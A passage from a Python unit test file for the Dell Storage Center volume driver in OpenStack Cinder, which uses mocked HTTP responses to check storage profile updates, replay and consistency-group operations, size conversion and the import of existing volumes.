return_value={'allowStorageProfileSelection': True})
def test_update_storage_profile_prefs_not_found(self,
mock_profile,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
res = self.scapi.update_storage_profile(None, 'Fake')
self.assertFalse(res)
self.assertEqual(1, LOG.error.call_count)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': True,
'storageProfile': None})
def test_update_storage_profile_default_not_found(self,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
res = self.scapi.update_storage_profile(None, None)
self.assertFalse(res)
self.assertEqual(1, LOG.error.call_count)
@mock.patch.object(
dell_storagecenter_api.StorageCenterApi,
'_get_user_preferences',
return_value={'allowStorageProfileSelection': True,
'storageProfile': {'name': 'Fake',
'instanceId': 'fakeId'}})
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
def test_update_storage_profile(self,
mock_put,
mock_prefs,
mock_close_connection,
mock_open_connection,
mock_init):
LOG = self.mock_object(dell_storagecenter_api, "LOG")
fake_scvolume = {'name': 'name', 'instanceId': 'id'}
res = self.scapi.update_storage_profile(fake_scvolume, None)
self.assertTrue(res)
self.assertTrue('fakeId' in repr(mock_put.call_args_list[0]))
self.assertEqual(1, LOG.info.call_count)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[RPLAY_PROFILE])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_replay_profile(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_replay_profile('guid')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.RPLAY_PROFILE, res, 'Unexpected Profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[RPLAY_PROFILE, RPLAY_PROFILE])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_replay_profile_more_than_one(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_replay_profile,
'guid')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_replay_profile_empty_list(self,
mock_post,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_replay_profile('guid')
self.assertTrue(mock_post.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res, 'Unexpected return')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_find_replay_profile_error(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_replay_profile('guid')
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Unexpected return')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=RPLAY_PROFILE)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_replay_profile(self,
mock_post,
mock_first_result,
mock_find_replay_profile,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay_profile('guid')
self.assertTrue(mock_find_replay_profile.called)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.RPLAY_PROFILE, res, 'Unexpected Profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay_profile',
return_value=RPLAY_PROFILE)
def test_create_replay_profile_exists(self,
mock_find_replay_profile,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay_profile('guid')
self.assertTrue(mock_find_replay_profile.called)
self.assertEqual(self.RPLAY_PROFILE, res, 'Unexpected Profile')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_replay_profile',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_create_replay_profile_fail(self,
mock_post,
mock_find_replay_profile,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_replay_profile('guid')
self.assertTrue(mock_find_replay_profile.called)
self.assertTrue(mock_post.called)
self.assertIsNone(res, 'Unexpected return')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_delete_replay_profile(self,
mock_get_id,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
self.scapi.delete_replay_profile(profile)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_delete.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'delete',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_delete_replay_profile_fail(self,
mock_get_id,
mock_delete,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.delete_replay_profile,
profile)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_delete.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_get_volume_configuration(self,
mock_get_id,
mock_get,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._get_volume_configuration({})
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get.called)
self.assertEqual(self.VOLUME_CONFIG, res, 'Unexpected config')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_get_volume_configuration_bad_response(self,
mock_get_id,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._get_volume_configuration({})
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'Unexpected result')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_configuration',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_update_volume_profiles(self,
mock_get_id,
mock_put,
mock_get_volume_configuration,
mock_close_connection,
mock_open_connection,
mock_init):
scvolume = {'instanceId': '1'}
existingid = self.VOLUME_CONFIG[u'replayProfileList'][0][u'instanceId']
vcid = self.VOLUME_CONFIG[u'instanceId']
# First get_id is for our existing replay profile id and the second
# is for the volume config and the last is for the volume id. And
# then we do this again for the second call below.
mock_get_id.side_effect = [existingid,
vcid,
scvolume['instanceId'],
existingid,
vcid,
scvolume['instanceId']]
newid = '64702.1'
expected_payload = {'ReplayProfileList': [newid, existingid]}
expected_url = 'StorageCenter/ScVolumeConfiguration/' + vcid
res = self.scapi._update_volume_profiles(scvolume, newid, None)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(res)
# Now do a remove. (Restarting with the original config so this will
# end up as an empty list.)
expected_payload['ReplayProfileList'] = []
res = self.scapi._update_volume_profiles(scvolume, None, existingid)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_with(expected_url, expected_payload, True)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_configuration',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_400)
# We set this to 1 so we can check our payload
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id')
def test_update_volume_profiles_bad_response(self,
mock_get_id,
mock_put,
mock_get_volume_configuration,
mock_close_connection,
mock_open_connection,
mock_init):
scvolume = {'instanceId': '1'}
existingid = self.VOLUME_CONFIG[u'replayProfileList'][0][u'instanceId']
vcid = self.VOLUME_CONFIG[u'instanceId']
# First get_id is for our existing replay profile id and the second
# is for the volume config and the last is for the volume id. And
# then we do this again for the second call below.
mock_get_id.side_effect = [existingid,
vcid,
scvolume['instanceId'],
existingid,
vcid,
scvolume['instanceId']]
newid = '64702.1'
expected_payload = {'ReplayProfileList': [newid, existingid]}
expected_url = 'StorageCenter/ScVolumeConfiguration/' + vcid
res = self.scapi._update_volume_profiles(scvolume, newid, None)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
self.assertFalse(res)
# Now do a remove. (Restarting with the original config so this will
# end up as an empty list.)
expected_payload['ReplayProfileList'] = []
res = self.scapi._update_volume_profiles(scvolume, None, existingid)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_get_volume_configuration.called)
mock_put.assert_called_with(expected_url, expected_payload, True)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_configuration',
return_value=None)
def test_update_volume_profiles_no_config(self,
mock_get_volume_configuration,
mock_close_connection,
mock_open_connection,
mock_init):
scvolume = {'instanceId': '1'}
res = self.scapi._update_volume_profiles(scvolume, '64702.2', None)
self.assertTrue(mock_get_volume_configuration.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=True)
def test_add_cg_volumes(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = '100'
add_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._add_cg_volumes(profileid, add_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=profileid,
removeid=None)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=False)
def test_add_cg_volumes_fail(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = '100'
add_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._add_cg_volumes(profileid, add_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=profileid,
removeid=None)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=True)
def test_remove_cg_volumes(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = '100'
remove_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._remove_cg_volumes(profileid, remove_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=None,
removeid=profileid)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'find_volume',
return_value=999)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_update_volume_profiles',
return_value=False)
def test_remove_cg_volumes_false(self,
mock_update_volume_profiles,
mock_find_volume,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = '100'
remove_volumes = [{'id': '1', 'provider_id': '1'}]
res = self.scapi._remove_cg_volumes(profileid, remove_volumes)
self.assertTrue(mock_find_volume.called)
mock_update_volume_profiles.assert_called_once_with(999,
addid=None,
removeid=profileid)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = [{'id': '2'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
mock_remove_cg_volumes.assert_called_once_with('100',
remove_volumes)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_no_remove(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = []
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
self.assertFalse(mock_remove_cg_volumes.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_no_add(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = []
remove_volumes = [{'id': '1'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_remove_cg_volumes.assert_called_once_with('100', remove_volumes)
self.assertFalse(mock_add_cg_volumes.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_add_fail(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = [{'id': '2'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
self.assertTrue(not mock_remove_cg_volumes.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_remove_cg_volumes',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_cg_volumes',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
def test_update_cg_volumes_remove_fail(self,
mock_get_id,
mock_add_cg_volumes,
mock_remove_cg_volumes,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'name': 'guid'}
add_volumes = [{'id': '1'}]
remove_volumes = [{'id': '2'}]
res = self.scapi.update_cg_volumes(profile,
add_volumes,
remove_volumes)
self.assertTrue(mock_get_id.called)
mock_add_cg_volumes.assert_called_once_with('100', add_volumes)
mock_remove_cg_volumes.assert_called_once_with('100',
remove_volumes)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[INACTIVE_VOLUME])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_volume')
def test_init_cg_volumes_inactive(self,
mock_init_volume,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = 100
self.scapi._init_cg_volumes(profileid)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
mock_init_volume.assert_called_once_with(self.INACTIVE_VOLUME)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[VOLUME])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_volume')
def test_init_cg_volumes_active(self,
mock_init_volume,
mock_get_json,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
profileid = 100
self.scapi._init_cg_volumes(profileid)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertFalse(mock_init_volume.called)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_cg_volumes')
def test_snap_cg_replay(self,
mock_init_cg_volumes,
mock_get_id,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
replayid = 'guid'
expire = 0
profile = {'instanceId': '100'}
# See the 100 from get_id above?
expected_url = 'StorageCenter/ScReplayProfile/100/CreateReplay'
expected_payload = {'description': replayid, 'expireTime': expire}
res = self.scapi.snap_cg_replay(profile, replayid, expire)
mock_post.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_init_cg_volumes.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_id',
return_value='100')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_init_cg_volumes')
def test_snap_cg_replay_bad_return(self,
mock_init_cg_volumes,
mock_get_id,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
replayid = 'guid'
expire = 0
profile = {'instanceId': '100'}
# See the 100 from get_id above?
expected_url = 'StorageCenter/ScReplayProfile/100/CreateReplay'
expected_payload = {'description': replayid, 'expireTime': expire}
res = self.scapi.snap_cg_replay(profile, replayid, expire)
mock_post.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(mock_get_id.called)
self.assertTrue(mock_init_cg_volumes.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=CGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_sc_cg(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_sc_cg(
{},
'GUID1-0869559e-6881-454e-ba18-15c6726d33c1')
self.assertEqual(self.CGS[0], res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=CGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_sc_cg_not_found(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_sc_cg(
{},
'GUID3-0869559e-6881-454e-ba18-15c6726d33c1')
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_sc_cg_fail(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_sc_cg(
{},
'GUID1-0869559e-6881-454e-ba18-15c6726d33c1')
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_sc_cg',
return_value={'instanceId': 101})
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_find_cg_replays(self,
mock_get,
mock_get_json,
mock_find_sc_cg,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'instanceId': '100'}
replayid = 'Cinder Test Replay012345678910'
res = self.scapi._find_cg_replays(profile, replayid)
expected_url = 'StorageCenter/ScReplayConsistencyGroup/101/ReplayList'
mock_get.assert_called_once_with(expected_url)
self.assertTrue(mock_find_sc_cg.called)
self.assertTrue(mock_get_json.called)
# We should fine RPLAYS
self.assertEqual(self.RPLAYS, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_sc_cg',
return_value=None)
def test_find_cg_replays_no_cg(self,
mock_find_sc_cg,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'instanceId': '100'}
replayid = 'Cinder Test Replay012345678910'
res = self.scapi._find_cg_replays(profile, replayid)
self.assertTrue(mock_find_sc_cg.called)
# We should return an empty list.
self.assertEqual([], res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_sc_cg',
return_value={'instanceId': 101})
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_find_cg_replays_bad_json(self,
mock_get,
mock_get_json,
mock_find_sc_cg,
mock_close_connection,
mock_open_connection,
mock_init):
profile = {'instanceId': '100'}
replayid = 'Cinder Test Replay012345678910'
res = self.scapi._find_cg_replays(profile, replayid)
expected_url = 'StorageCenter/ScReplayConsistencyGroup/101/ReplayList'
mock_get.assert_called_once_with(expected_url)
self.assertTrue(mock_find_sc_cg.called)
self.assertTrue(mock_get_json.called)
self.assertIsNone(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_cg_replays',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_delete_cg_replay(self,
mock_post,
mock_find_cg_replays,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.delete_cg_replay({}, '')
expected_url = ('StorageCenter/ScReplay/' +
self.RPLAYS[0]['instanceId'] +
'/Expire')
mock_post.assert_any_call(expected_url, {}, True)
expected_url = ('StorageCenter/ScReplay/' +
self.RPLAYS[1]['instanceId'] +
'/Expire')
mock_post.assert_any_call(expected_url, {}, True)
self.assertTrue(mock_find_cg_replays.called)
self.assertTrue(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_cg_replays',
return_value=RPLAYS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_delete_cg_replay_error(self,
mock_post,
mock_find_cg_replays,
mock_close_connection,
mock_open_connection,
mock_init):
expected_url = ('StorageCenter/ScReplay/' +
self.RPLAYS[0]['instanceId'] +
'/Expire')
res = self.scapi.delete_cg_replay({}, '')
mock_post.assert_called_once_with(expected_url, {}, True)
self.assertTrue(mock_find_cg_replays.called)
self.assertFalse(res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_cg_replays',
return_value=[])
def test_delete_cg_replay_cant_find(self,
mock_find_cg_replays,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.delete_cg_replay({}, '')
self.assertTrue(mock_find_cg_replays.called)
self.assertTrue(res)
def test_size_to_gb(self,
mock_close_connection,
mock_open_connection,
mock_init):
gb, rem = self.scapi.size_to_gb('1.073741824E9 Byte')
self.assertEqual(1, gb)
self.assertEqual(0, rem)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.size_to_gb,
'banana')
gb, rem = self.scapi.size_to_gb('1.073741924E9 Byte')
self.assertEqual(1, gb)
self.assertEqual(100, rem)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_volume_folder')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'put',
return_value=RESPONSE_200)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=VOLUME)
def test_import_one(self,
mock_get_json,
mock_put,
mock_find_volume_folder,
mock_close_connection,
mock_open_connection,
mock_init):
newname = 'guid'
# First test is folder found. Second ist is not found.
mock_find_volume_folder.side_effect = [{'instanceId': '1'}, None]
expected_url = 'StorageCenter/ScVolume/100'
expected_payload = {'Name': newname,
'VolumeFolder': '1'}
self.scapi._import_one({'instanceId': '100'}, newname)
mock_put.assert_called_once_with(expected_url, expected_payload, True)
self.assertTrue(mock_find_volume_folder.called)
expected_payload = {'Name': newname}
self.scapi._import_one({'instanceId': '100'}, newname)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=VOLUME)
def test_manage_existing(self,
mock_import_one,
mock_find_mappings,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.scapi.manage_existing(newname, existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'), None, False)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[])
def test_manage_existing_vol_not_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Same as above only we don't have a volume folder.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{}, {}, {}])
def test_manage_existing_vol_multiple_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Same as above only we don't have a volume folder.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741924E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 100))
def test_manage_existing_bad_size(self,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# Same as above only we don't have a volume folder.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[{}, {}])
def test_manage_existing_already_mapped(self,
mock_find_mappings,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_import_one',
return_value=None)
def test_manage_existing_import_fail(self,
mock_import_one,
mock_find_mappings,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
# We fail on the _find_volume_folder to make this easier.
newname = 'guid'
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.manage_existing,
newname,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_size_to_gb.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[{'configuredSize':
'1.073741824E9 Bytes'}])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'size_to_gb',
return_value=(1, 0))
def test_get_unmanaged_volume_size(self,
mock_size_to_gb,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
res = self.scapi.get_unmanaged_volume_size(existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
False)
self.assertTrue(mock_size_to_gb.called)
self.assertEqual(1, res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_volume_list',
return_value=[])
def test_get_unmanaged_volume_size_not_found(self,
mock_get_volume_list,
mock_close_connection,
mock_open_connection,
mock_init):
existing = {'source-name': 'scvolname'}
self.assertRaises(exception.ManageExistingInvalidReference,
self.scapi.get_unmanaged_volume_size,
existing)
mock_get_volume_list.assert_called_once_with(
existing.get('source-name'),
existing.get('source-id'),
